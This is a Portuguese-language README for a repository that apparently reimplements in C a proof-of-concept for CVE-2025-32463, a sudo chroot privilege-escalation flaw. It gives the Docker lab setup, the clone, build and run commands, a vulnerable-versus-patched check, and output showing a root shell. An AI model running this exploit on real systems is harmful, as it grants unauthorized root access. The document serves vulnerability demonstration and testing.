
Reimplementação em C do PoC chwoot
Este repositório fornece um ambiente mínimo e reproduzível para demonstrar a falha de elevação de privilégios CVE‑2025‑32463 no recurso chroot do sudo.
As compilações vulneráveis do sudo 1.9.14 até 1.9.17 (todas as revisões p) na maioria das distribuições Linux são afetadas.
Páginas de Segurança
| Arquivo | Propósito |
|---|---|
| Dockerfile | Constrói uma imagem Ubuntu 24.04 com sudo 1.9.16p2 vulnerável e ferramentas de compilação |
| sudo‑chwoot.sh | Exploit de prova de conceito que inicia um shell root dentro do chroot |
# Vulnerable sudo
poc ~ $ sudo -R woot woot
sudo: woot: No such file or directory
# Patched sudo
poc ~ $ sudo -R woot woot
[sudo] password for poc:
sudo: you are not permitted to use the -R option with woot
# 1 – clone repo
$ git clone https://github.com/vpr-labs/CVE-2025-32463.git
$ cd CVE-2025-32463
# 2 – build and run Docker image (tagged "vpr-chwoot")
$ ./run.sh
# 3 – run exploit in container (runs root command directly)
poc@f722d9182d1f:~$ make && ./vpr-chwoot
woot!
root@f722d9182d1f:/# id
uid=0(root) gid=0(root) groups=0(root),1001(poc)
root@f722d9182d1f:/#
run.sh passa --privileged e --rm para o Docker para que o contêiner se limpe ao sair.
Remova a imagem quando terminar:
docker rmi vpr-chwoot
| Script auxiliar que constrói a imagem (se necessário) e inicia o contêiner do exploit |